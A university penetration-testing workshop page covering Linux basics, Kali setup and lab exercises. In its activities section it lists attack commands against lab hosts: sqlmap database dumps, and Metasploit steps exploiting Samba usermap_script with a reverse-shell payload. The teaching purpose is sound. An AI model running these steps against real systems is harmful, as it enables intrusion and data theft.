
COMP350_2018 / Week 2 Workshop

##Participation task:

Create a bitbucket repository, add a wiki, and share it with me (sutantyo) (1%)

##Readings:

  • PT Chapter 4 for metasploit, but see the Offensive Security course below
  • PT Chapter 5 on Port Scanning with nmap, but see the nmap guide in the list below
  • You can also get started on PT Chapter 6-7 for more background reading

Note that you do not need to read EVERYTHING by this week. We are going to talk about these four tools and you are going to learn them bit by bit over the next 2-3 weeks (and even by then, I do not expect you to be experts). I do, however, expect you to make notes of the important things.

##Announcements:

###1. iLearn

Everyone enrolled should now have access to the forum.

###2. SecTalks

SecTalks is a monthly meetup focusing on IT security. The Sydney chapter holds the meeting every 2nd Tuesday at PWC offices in Barangaroo. I believe the plan is to finish the class at 5pm, and then whoever is interested can come along.

It is a good opportunity to see people who work in the security industry, but there are also many novices and students. Every meetup is usually followed by a CTF and then drinks at the local bar.

To sign up, you need to make an account with meetup.com and join: https://www.meetup.com/SecTalks/events/248276504/

I have a +3 on my sign-up, so if you're not sure about coming, you can decide later. However, if you are interested in coming, I would suggest that you sign up.

Topic of next week's SecTalks:

Reverse engineering and analysing the Microsoft Word vulnerability CVE-2017-11826: an in-depth analysis explaining how the exploit bypasses Microsoft mitigation techniques like ASLR and DEP; as an add-on, the talk will also cover shellcode analysis. The exploit and vulnerability analysis will be performed using WinDbg, IDA Pro and other malware analysis tools. Attendees can walk away with a basic idea of how to approach Microsoft Word vulnerability analysis.

###3. Week 3 CTF

The first CTF is going to be group based and I will try to allocate the groups as fairly as I can. Please let me know by email if you have a preference on who to group with by this Friday. The students who participated in CYSCA last year will be distributed among the groups (we should have 6 groups at most).

###4. Textbooks

I will update the Resources page as we go, but in case you missed it, the last update was for a free Kali Linux book. It may help you get around in Kali Linux.

##Activities:

###1. OverTheWire Bandit Machine and Linux

We threw you in the deep end last week, but I hope you enjoyed the experience because I personally think the wargames are quite fun. By now, you would have had several hours' worth of Linux experience (or so I hope), so let us recap the more useful skills that you have acquired.

One of the most essential concepts for you to know is that every command you type is an executable that resides somewhere in the system (a few, like cd, are built into the shell itself rather than being separate executables). You can find out the location of this executable using the which command, e.g.

```
> which ls
/bin/ls
```

Plus, every command can take options, e.g.:

```
> ls -a -l
```

OR

```
> ls -al
```

These are the two important takeaways if you are new to UNIX. Of course you also learnt how to use man and help to find out more about UNIX commands. I personally prefer to open an online man page (http://man.he.net/) since it is easier to read and doesn't interfere with my terminal.

However, it can be faster to use the --help option to get a summary of the options available for a program:

```
> ls --help
```

Another set of terms you need to roughly know is stdin (0), stdout (1), and stderr (2). These are the three character streams available for you to communicate with the Linux machine. stdin is the stream from your keyboard, stdout is the stream to the screen, and so is stderr, although this one is used to print error messages. In Java, remember System.out? Have you tried System.err and System.in?

You can read about it here: http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html for more information.

You also know a bit more about the directory structure and moving around, i.e. cd:

```
pwd   : print working directory, i.e. current directory
cd ~  : goes to home directory
cd /  : goes to root directory (i.e. the top level directory)
cd .. : goes to parent directory
cd -  : goes to your previous working directory
```

For example, if you want to find all files with the name hello in the current folder, you would type

```
> find . -name hello
```

and if you want to search from the root directory:

```
> find / -name hello 2>/dev/null
```

What is that 2>/dev/null doing there? Well, if you try to search from root, you will probably run into permission issues (lots of "Permission denied" messages). What you are doing here is redirecting all error messages (stream 2, stderr) to the trash bin (google dev/null).

Finally, why do you have permission issues? Because every Linux file has permissions set on who can read, write, and execute it. You can read more about it here: https://en.wikipedia.org/wiki/Chmod
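To see the streams and redirections from this recap in action, here is an added example (my own, not part of the workshop notes) that builds a constructed directory tree under a temporary directory; the helper names such as chatty, only_stderr and count_hello are my own.

```shell
#!/bin/sh
# Added example, not from the workshop page: the three standard streams
# (stdin 0, stdout 1, stderr 2) and the redirections used with find above.
# All files live in a constructed temporary directory, so this runs anywhere.
set -eu

# Build a small constructed tree containing two files named "hello".
make_sandbox() {
  dir=$(mktemp -d)
  mkdir -p "$dir/a/b" "$dir/c"
  : > "$dir/a/hello"
  : > "$dir/c/hello"
  : > "$dir/c/other"
  printf '%s' "$dir"
}

# Where does a command live? Same idea as `which ls`; prints the path.
where_is() { command -v "$1"; }

# A tiny program that talks on both streams, like System.out vs System.err:
# the greeting goes to fd 1 (stdout), the warning to fd 2 (stderr).
chatty() {
  echo "greeting on stdout"
  echo "warning on stderr" >&2
}

# Keep only stdout: fd 2 is sent to /dev/null, so the warning never arrives.
only_stdout() { chatty 2>/dev/null; }

# Keep only stderr: first point fd 2 at wherever fd 1 currently goes (the
# caller), then send the original fd 1 to /dev/null. Redirection order matters.
only_stderr() { chatty 2>&1 1>/dev/null; }

# Count files named hello, discarding any "Permission denied" noise on fd 2,
# exactly like `find / -name hello 2>/dev/null` in the notes.
count_hello() {
  find "$1" -name hello 2>/dev/null | wc -l | tr -d ' '
}

# Set and show a file's permission bits (owner rw, group r, others nothing),
# the mechanism behind the errors that `find /` produces for a normal user.
perm_bits() {
  chmod 640 "$1"
  ls -l "$1" | cut -c1-10
}
```

Source the file (`. ./streams.sh`) and try `count_hello "$(make_sandbox)"`, or run `only_stderr` on its own to watch only the warning reach your terminal.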

###2. Kali Linux quality of life enhancements

In last week's instructions on Kali installation, I added:

```
sudo apt-get install -y virtualbox-guest-x11
```

which installs the VirtualBox guest additions, giving a few useful enhancements such as full screen display (otherwise you will be limited to 1024x768), shared folders, copy and paste between host and guest machine, and also drag and drop. It might be a good idea to have these set up.

You need to enable some of these from virtualbox settings (General -> Advanced, Shared Folders).

Note that on Kali terminal window, ctrl+c is cancel. If you want to copy and paste from the terminal, use ctrl+shift+c and ctrl+shift+v.

If things don't work:

You may have installed virtualbox-guest-x11 before you did a dist-upgrade, so you may need to uninstall it. First, do a dist-upgrade and then reboot:

```
sudo apt-get dist-upgrade
sudo reboot
```

If it still doesn't work, try removing virtualbox-guest-x11 and reinstalling it after the upgrade (it might be excessive):

```
apt-get purge virtualbox-guest-x11
apt-get autoremove --purge
reboot
apt-get update
apt-get dist-upgrade
reboot
apt-get update
apt-get install -y virtualbox-guest-x11
reboot
```

###3. OWASP ZAP and Metasploit

Jeremy is going to give a demo of the above two tools. I will add supplementary notes here later. I hope he has time for nmap as well.

Notes: if you want to use the hostnames below, you need to modify the file /etc/hosts and add:

```
10.81.238.245   ms1
10.81.235.187   btr1
```

The machines are:

Tools used for btr1:

  1. nmap:
    • ping btr1
    • nmap btr1 -P0 -F
    • nmap -sV -O btr1
    • nmap -A btr1
  2. nikto:
    • nikto -h btr1
  3. dirb:
    • dirb http://btr1
  4. browser:
    • go to Login.php
    • go to Find personnel.php
    • decipher javascript
  5. OWASP ZAP:
    • set up proxy (and set Firefox to use this proxy)
    • spidering
    • active scan on personnel
    • request interception
  6. sqlmap:
    • sqlmap -u 'http://10.81.235.187:80/personel.php' --data='kullanici_adi=btrisk&parola=tester' --flush
    • sqlmap -u 'http://10.81.235.187:80/personel.php' --data='kullanici_adi=btrisk&parola=tester' --tables --dbs --columns --dump

Tools used for metasploitable1:

  1. nmap (to find open samba port):
    • nmap ms1 -P0 -sV -F
  2. enum4linux
  3. metasploit framework:
    • use module: use auxiliary/scanner/smb/smb_version
    • searchsploit samba 3.0.20
    • search usermap
    • set payload tt
    • search samba for usermap_script, use exploit/multi/samba/usermap_script
    • show options
    • set rhost <ip address>
    • set payload cmd/unix/reverse
    • set lhost
    • run

###4. Time permitting

Download and install a machine from VulnHub. We are going to use the Necromancer machine from VulnHub: https://www.vulnhub.com/entry/the-necromancer-1,154/. I have the image on USB in case the internet is flaky again like last week.

You can import the machine image directly into VirtualBox, but you need to set up host networking for it to work properly. Go to File -> Host Network Manager, and create one. Now in your Kali Linux machine settings, go to Settings -> Network, click on Adapter 2 and add a Host-only adapter. Add the same to your Necromancer machine.

Start up the Necromancer machine, and note its IP address. For your Kali Linux, change the connection to eth1 (I guess?) and see if you can nmap it.

##Extras

###VPN Access

I am not sure if this is required yet, but everyone should now have VPN access using your MQ id.

https://wiki.mq.edu.au/display/onenet/OneNet+Anywhere

```
apt-get install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome network-manager-strongswan network-manager-vpnc network-manager-vpnc-gnome
```
